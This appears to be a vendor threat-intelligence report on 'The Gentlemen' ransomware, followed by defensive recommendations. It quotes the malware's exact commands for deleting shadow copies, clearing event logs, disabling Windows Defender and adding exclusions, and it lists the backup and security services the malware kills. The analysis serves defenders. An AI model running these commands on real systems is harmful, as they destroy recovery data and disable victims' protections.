Unmasking The Gentlemen Ransomware: Tactics, Techniques, and Procedures Revealed

In terms of execution, the ransomware accepts specific parameters:

• –password (Required): 8-byte password parameter needed to execute the ransomware
• –path (Optional): Target path parameter for specifying custom encryption directory

The ransomware aggressively attempts to terminate key services commonly associated with backup, database, and security processes to maximize its impact:

net stop <service_name>

(.*)sql(.*), AcrSch2Svc, VSNAPVSS, MVarmor64, MVarmor, VeeamTransportSvc, VeeamDeploymentService, VeeamNFSSvc, AcronisAgent, QBIDPService, QBDBMgrN, QBCFMonitorService, OracleServiceORCL, MySQL, MSSQL, SAPHostExec, SAPHostControl, SAPD$, SAP$, postgresql, SAP, SAPService, GxFWD, GxVsshWProv, GXMMM, GxClMgr, MariaDB, GxCVD, GxClMgrS, GxVss, GxBlr, BackupExecRPCService, SQLAgent$SQLEXPRESS, BackupExecManagementService, BackupExecJobEngine, MSSQL$SQLEXPRESS, BackupExecDiveciMediaService, BackupExecAgentBrowser, SQLWriter, BackupExecAgentAccelerator, BackupExecVSSProvider, PDVFSService, SQLSERVERAGENT, WSBExchange, MSExchange\$, MSExchange, sophos, msexchange, docker, MSSQLSERVER, MSSQL*, Sql, vss, backup, veeam, memtas, mepocs, vmms

Further, the threat systematically terminates processes using the following commands:

taskkill /IM <process_name>.exe /F

Veeam.EndPoint.Service.exe, mvdesktopservice.exe, VeeamDeploymentSvc.exe, VeeamTransportSvc.exe, VeeamNFSSvc.exe, EnterpriseClient.exe, DellSystemDetect.exe, avscc.exe, avagent.exe, sapstartsrv.exe, saposco.exe, saphostexec.exe, CVODS.exe, cvfwd.exe, cvd.exe, CVMountd.exe, tv_x64.exe, tv_w32.exe, pgAdmin4.exe, TeamViewer.exe, TeamViewer_Service.exe, SAP.exe, QBCFMonitorService.exe, pgAdmin3.exe, QBDBMgrN.exe, QBIDPService.exe, CagService.exe, vsnapvss.exe, raw_agent_svc.exe, cbInterface.exe, “Docker Desktop.exe”, beserver.exe, pvlsvr.exe, bengien.exe, benetns.exe, vxmon.exe, bedbh.exe, IperiusService.exe, sqlceip.exe, xfssvccon.exe, wordpad.exe, winword.exe, visio.exe, thunderbird.exe, thebat.exe, Iperius.exe, psql.exe, postgres.exe, tbirdconfig.exe, synctime.exe, steam.exe, sqbcoreservice.exe, powerpnt.exe, cbVSCService11.exe, postmaster.exe, mysqld.exe, outlook.exe, oracle.exe, onenote.exe, ocssd.exe, ocomm.exe, ocautoupds.exe, SQLAGENT.exe, sqlwriter.exe, notepad.exe, mydesktopservice.exe, mydesktopqos.exe, mspub.exe, msaccess.exe, cbService.exe, sqlbrowser.exe, w3wp.exe, sql.exe, isqlplussvc.exe, infopath.exe, firefox.exe, excel.exe, encsvc.exe, Ssms.exe, DBeaver.exe, sqlservr.exe, dbsnmp.exe, dbeng50.exe, agntsvc.exe, vmcompute.exe, vmwp.exe, vmms.exe

Beyond service and process termination, the ransomware executes additional commands to impede recovery and forensic investigation:

• Deletes the Recycle Bin content: cmd /C “rd /s /q C:\$Recycle.Bin”
• Deletes Remote Desktop Protocol (RDP) log files: cmd /C “del /f /q %SystemRoot%\System32\LogFiles\RDP*\*.*”
• Deletes Windows Defender support files: cmd /C “del /f /q C:\ProgramData\Microsoft\Windows Defender\Support\*.*”
• Deletes Prefetch files: cmd /C “del /f /q C:\Windows\Prefetch\*.*“
• Adds C:\ to Windows Defender exclusion path: powershell -Command “Add-MpPreference -ExclusionPath C:\ -Force”
• Adds the {filename} of the ransomware to the Windows Defender exclusion process: powershell -Command “Add-MpPreference -ExclusionProcess C:\Users\User\Desktop\{filename}.exe -Force
• Disables Windows Defender real-time monitoring: powershell -Command “Set-MpPreference -DisableRealtimeMonitoring $true -Force”
•     wevtutil cl Security
•     wevtutil cl Application
•     wevtutil cl System
•  Deletes shadow copies:
•    wmic shadowcopy delete
•    vssadmin delete shadows /all /quiet

For final cleanup, the ransomware drops a batch script named after itself (e.g., {filename}.exe.bat). This script pings the local host for a brief delay, deletes the ransomware binary, and then deletes itself. This ensures comprehensive removal of its artifacts after the encryption routine is complete.

The Gentlemen ransomware campaign shows the rapid evolution of modern ransomware threats, blending advanced technical sophistication with persistent, targeted operations. This campaign is distinguished by its use of custom-built tools for defense evasion, its ability to study and adapt to deployed security software, and its methodical abuse of both legitimate and vulnerable system components to subvert layered enterprise defenses. By tailoring their tactics against specific security vendors, The Gentlemen have demonstrated an acute awareness of their targets’ environments and a willingness to engage in in-depth reconnaissance and tool modification throughout the course of their operation.

The campaign’s impact on critical infrastructure and use of double extortion techniques underscores the significant risk this threat actor poses to organizations. Their campaign illustrates the growing trend among ransomware operators to move beyond “one-size-fits-all” methods and toward highly customized attacks, raising the bar for detection, prevention, and incident response.

Organizations are strongly advised to review their security posture, focusing on proactive threat hunting for group-specific tools, tactics, and procedures, the strengthening of endpoint and network protections, and the continuous refinement of incident response strategies. Particular attention should be given to monitoring for anomalous administrative activity, the abuse of legitimate tools for lateral movement and privilege escalation, and early indications of defense evasion efforts targeting security solutions.

Given the group’s exploitation of internet-facing infrastructure and VPN appliances, Zero Trust controls are essential for preventing initial access and limiting blast radius. Organizations must eliminate direct RDP exposure to the internet, enforce multi-factor authentication for all administrative interfaces, and implement network segmentation between IT management tools and production systems. Enterprises should also implement virtual patching for known vulnerabilities in perimeter devices, particularly VPN concentrators and firewalls that THE GENTLEMEN has been observed targeting.

Essential access controls and monitoring include:

• Restricting domain controller share access and alerting on unauthorized NETLOGON modifications
• Auto-isolating devices showing indicators of driver-based attacks or anti-AV tool execution
• Implementing time-based access controls for privileged accounts with automatic de-escalation
• Monitoring for mass Active Directory queries and bulk group membership changes
• Deploying deception technologies on critical file shares to detect reconnaissance activities

The immediate priority is hardening endpoint security deployments against the group’s documented process termination techniques. Organizations using Trend solutions should enable Tamper Protection with Anti-exploit Protection to prevent custom tools from terminating critical security processes. Additionally, password-protect agent uninstallation and activating Agent Self-Protection alongside Predictive Machine Learning in both pre-execution and runtime modes. These configurations specifically counter the group’s attempts to disable security services before ransomware deployment.

Critical endpoint controls should include:

• Blocking execution from temporary and user download directories where attack tools are typically staged
• Monitoring service stop commands targeting security processes and alerting on mass termination attempts
• Implementing application control to restrict unauthorized remote access tools (RDP clients, file transfer utilities)
• Enforcing driver signature verification and alerting on vulnerable driver loading attempts
• Enabling behavioral detection for privilege escalation and credential dumping activities
   

Read More HERE